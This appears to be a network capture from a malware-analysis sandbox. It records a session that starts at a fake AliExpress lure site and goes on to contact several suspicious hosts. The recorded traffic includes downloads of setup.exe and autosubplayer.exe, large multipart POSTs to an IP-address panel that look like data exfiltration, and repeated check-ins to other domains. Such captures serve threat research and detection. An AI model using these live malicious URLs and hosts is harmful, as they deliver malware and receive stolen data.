Location: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Set-Cookie: uncs=2; expires=Fri, 10 Sep 2021 04:33:11 GMT
Set-Cookie: uncs28=2; expires=Fri, 10 Sep 2021 04:33:11 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 700533f578e63eeb59c8adf3a4da8eb9
Strict-Transport-Security: max-age=0; includeSubdomains
DNS

aliexpress.5i8xkqjmqubv.top

Request

aliexpress.5i8xkqjmqubv.top

IN A

Response

aliexpress.5i8xkqjmqubv.top

IN A

194.63.143.61
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11

Request

GET /shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: text/html
Content-Length: 4870
Last-Modified: Tue, 10 Nov 2020 14:09:49 GMT
Connection: keep-alive
Keep-Alive: timeout=10
ETag: "5faa9f2d-1306"
Accept-Ranges: bytes
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/css/main.css

Request

GET /shop/ali/new2-2/css/main.css HTTP/1.1
Accept: text/css, */*
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: text/css
Content-Length: 4364
Last-Modified: Tue, 10 Nov 2020 14:32:42 GMT
Connection: keep-alive
Keep-Alive: timeout=10
ETag: "5faaa48a-110c"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/js/jquery.min.js

Request

GET /shop/ali/new2-2/js/jquery.min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 401 Unauthorized

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Keep-Alive: timeout=10
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/img/11177.ttf

Request

GET /shop/ali/new2-2/img/11177.ttf HTTP/1.1
Accept: */*
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Origin: https://aliexpress.5i8xkqjmqubv.top
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:26 GMT
Content-Type: application/octet-stream
Content-Length: 97284
Last-Modified: Tue, 10 Nov 2020 14:09:52 GMT
Connection: keep-alive
Keep-Alive: timeout=10
ETag: "5faa9f30-17c04"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
GET

https://aliexpress.5i8xkqjmqubv.top/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:31 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive
Keep-Alive: timeout=10
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/js/confetti.js

Request

GET /shop/ali/new2-2/js/confetti.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 401 Unauthorized

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Keep-Alive: timeout=10
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/js/language.js

Request

GET /shop/ali/new2-2/js/language.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 401 Unauthorized

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Keep-Alive: timeout=10
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/img/pic2.png

Request

GET /shop/ali/new2-2/img/pic2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: image/png
Content-Length: 44395
Last-Modified: Tue, 10 Nov 2020 14:09:53 GMT
Connection: keep-alive
Keep-Alive: timeout=10
ETag: "5faa9f31-ad6b"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
GET

https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/img/pic1.png

Request

GET /shop/ali/new2-2/img/pic1.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://aliexpress.5i8xkqjmqubv.top/shop/ali/new2-2/index.html?country_code=US&p1=https%3A%2F%2Fs.click.aliexpress.com%2Fe%2F_AP97Pd%3Faf%3D14576783%26dp%3D38e47ee20c9aaa2a6f4218627ae4fe11
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: aliexpress.5i8xkqjmqubv.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.9.5
Date: Thu, 09 Sep 2021 04:33:24 GMT
Content-Type: image/png
Content-Length: 54240
Last-Modified: Tue, 10 Nov 2020 14:09:52 GMT
Connection: keep-alive
Keep-Alive: timeout=10
ETag: "5faa9f30-d3e0"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----093bb1938ac88002d16cf75cdfd8c8d4
Host: 185.215.113.202
Content-Length: 90971
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:33:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:33:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

iceanedy.com

Request

iceanedy.com

IN A

Response

iceanedy.com

IN A

104.21.86.39

iceanedy.com

IN A

172.67.214.126
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Thu, 09 Sep 2021 04:35:59 GMT
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 58
Date: Thu, 09 Sep 2021 04:36:02 GMT
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 57
Date: Thu, 09 Sep 2021 04:36:05 GMT
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 56
Date: Thu, 09 Sep 2021 04:36:08 GMT
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 55
Date: Thu, 09 Sep 2021 04:36:12 GMT
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 54
Date: Thu, 09 Sep 2021 04:36:35 GMT
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 53
Date: Thu, 09 Sep 2021 04:36:39 GMT
GET

http://194.145.227.159/pub.php?pub=five

Request

GET /pub.php?pub=five HTTP/1.1
Host: 194.145.227.159
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.20.1
Date: Thu, 09 Sep 2021 04:35:59 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
GET

http://194.145.227.159/pub.php?pub=five

Request

GET /pub.php?pub=five HTTP/1.1
Host: 194.145.227.159

Response

HTTP/1.1 200 OK

Server: nginx/1.20.1
Date: Thu, 09 Sep 2021 04:36:09 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
DNS

source3.boys4dayz.com

Request

source3.boys4dayz.com

IN A

Response

source3.boys4dayz.com

IN A

172.67.148.61

source3.boys4dayz.com

IN A

104.21.33.188
DNS

htagzdownload.pw

Request

htagzdownload.pw

IN A

Response
DNS

aa.goatgamea.com

Request

aa.goatgamea.com

IN A

Response

aa.goatgamea.com

IN A

172.67.221.12

aa.goatgamea.com

IN A

104.21.62.66
DNS

bb.goatgameb.com

Request

bb.goatgameb.com

IN A

Response

bb.goatgameb.com

IN A

104.21.28.120

bb.goatgameb.com

IN A

172.67.146.7
DNS

fsstoragecloudservice.com

Request

fsstoragecloudservice.com

IN A

Response

fsstoragecloudservice.com

IN A

111.90.156.46
GET

http://fsstoragecloudservice.com/campaign3/autosubplayer.exe

Request

GET /campaign3/autosubplayer.exe HTTP/1.1
Host: fsstoragecloudservice.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: Keep-Alive
X-Powered-By: PHP/7.4.23
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Thu, 09 Sep 2021 04:36:14 GMT
Server: LiteSpeed
GET

http://cleaner-partners.biz/stats/1.php?pub=/eufive%20

Request

GET /stats/1.php?pub=/eufive%20 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:36:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET

http://cleaner-partners.biz/check.php?pub=eufive

Request

GET /check.php?pub=eufive HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: tZ-49-qz-HX-l-4
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:36:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
DNS

a.goatgame.co

Request

a.goatgame.co

IN A

Response

a.goatgame.co

IN A

104.21.79.144

a.goatgame.co

IN A

172.67.146.70
GET

http://cleaner-partners.biz/stats/1.php?pub=/mixfive%20

Request

GET /stats/1.php?pub=/mixfive%20 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:36:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET

http://cleaner-partners.biz/check.php?pub=mixfive

Request

GET /check.php?pub=mixfive HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: 0F-xF-38-2G-y-B
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:36:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:36:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----20e4c199f338e9496b23be7c1df213e7
Host: 185.215.113.202
Content-Length: 74558
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:36:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

vexacion.com

Request

vexacion.com

IN A

Response

vexacion.com

IN A

139.45.197.236
GET

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 515
Cache-Control: max-age=108862
Content-Type: application/ocsp-response
Date: Thu, 09 Sep 2021 04:37:11 GMT
Etag: "613893b2-1d7"
Expires: Fri, 10 Sep 2021 10:51:33 GMT
Last-Modified: Wed, 08 Sep 2021 10:42:58 GMT
Server: ECS (amb/6BB4)
X-Cache: HIT
Content-Length: 471
GET

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAbeQ5ui303NgkDCEdYM314%3D

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAbeQ5ui303NgkDCEdYM314%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 981
Cache-Control: max-age=125846
Content-Type: application/ocsp-response
Date: Thu, 09 Sep 2021 04:37:47 GMT
Etag: "6138d45c-1d7"
Expires: Fri, 10 Sep 2021 15:35:13 GMT
Last-Modified: Wed, 08 Sep 2021 15:18:52 GMT
Server: ECS (amb/6BB4)
X-Cache: HIT
Content-Length: 471
GET

http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl

Request

GET /DigiCertHighAssuranceEVRootCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl3.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3988
Cache-Control: max-age=10800
Content-Type: application/pkix-crl
Date: Thu, 09 Sep 2021 04:37:33 GMT
Etag: "3942134450"
Expires: Thu, 09 Sep 2021 07:37:33 GMT
Last-Modified: Thu, 02 Sep 2021 22:15:06 GMT
Server: ECS (amb/6B72)
X-Cache: HIT
Content-Length: 592
GET

http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl

Request

GET /EVCodeSigningSHA2-g1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl3.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3996
Cache-Control: max-age=10800
Content-Type: application/pkix-crl
Date: Thu, 09 Sep 2021 04:37:41 GMT
Etag: "2810188662"
Expires: Thu, 09 Sep 2021 07:37:41 GMT
Last-Modified: Wed, 08 Sep 2021 23:32:56 GMT
Server: ECS (amb/6BA9)
X-Cache: HIT
Content-Length: 125161
DNS

crl4.digicert.com

Request

crl4.digicert.com

IN A

Response

crl4.digicert.com

IN CNAME

cs9.wac.phicdn.net

cs9.wac.phicdn.net

IN A

93.184.220.29
GET

http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl

Request

GET /DigiCertHighAssuranceEVRootCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl4.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3994
Cache-Control: max-age=10800
Content-Type: application/pkix-crl
Date: Thu, 09 Sep 2021 04:37:39 GMT
Etag: "3942134450"
Expires: Thu, 09 Sep 2021 07:37:39 GMT
Last-Modified: Thu, 02 Sep 2021 22:15:06 GMT
Server: ECS (amb/6B72)
X-Cache: HIT
Content-Length: 592
GET

http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl

Request

GET /EVCodeSigningSHA2-g1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl4.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 4002
Cache-Control: max-age=10800
Content-Type: application/pkix-crl
Date: Thu, 09 Sep 2021 04:37:47 GMT
Etag: "2810188662"
Expires: Thu, 09 Sep 2021 07:37:47 GMT
Last-Modified: Wed, 08 Sep 2021 23:32:56 GMT
Server: ECS (amb/6BA9)
X-Cache: HIT
Content-Length: 125161
GET

http://vexacion.com/afu.php?zoneid=1851483

Request

GET /afu.php?zoneid=1851483 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:37:58 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: ec37b7aea58e3aa556857a31455bc274
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=bf944af6294442acb2e1ed3662042e28; expires=Fri, 09 Sep 2022 04:38:02 GMT; path=/
Set-Cookie: oaidts=1631162282; expires=Fri, 09 Sep 2022 04:38:02 GMT; path=/
Set-Cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMT
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
GET

http://vexacion.com/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=bf944af6294442acb2e1ed3662042e28; oaidts=1631162282

Response

HTTP/1.1 204 No Content

Server: nginx
Date: Thu, 09 Sep 2021 04:38:10 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
GET

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6DC0OInqPHDQQUD4BhHIIxYdUvKOeNRji0LOHG2eICEAzmtf2PsbB81NVMrv5Nv1c%3D

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6DC0OInqPHDQQUD4BhHIIxYdUvKOeNRji0LOHG2eICEAzmtf2PsbB81NVMrv5Nv1c%3D HTTP/1.1
Cache-Control: max-age = 127232
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 02 Sep 2021 01:00:34 GMT
If-None-Match: "61302232-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3863
Cache-Control: max-age=163610
Content-Type: application/ocsp-response
Date: Thu, 09 Sep 2021 04:38:04 GMT
Etag: "61395caf-1d7"
Expires: Sat, 11 Sep 2021 02:04:54 GMT
Last-Modified: Thu, 09 Sep 2021 01:00:31 GMT
Server: ECS (amb/6B8F)
X-Cache: HIT
Content-Length: 471
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Thu, 09 Sep 2021 04:39:09 GMT
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:39:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----c5b3da73adacd81b5962e60b6b987e52
Host: 185.215.113.202
Content-Length: 39311
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:39:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

vexacion.com

Request

vexacion.com

IN A

Response

vexacion.com

IN A

139.45.197.236
GET

http://vexacion.com/afu.php?zoneid=1851513

Request

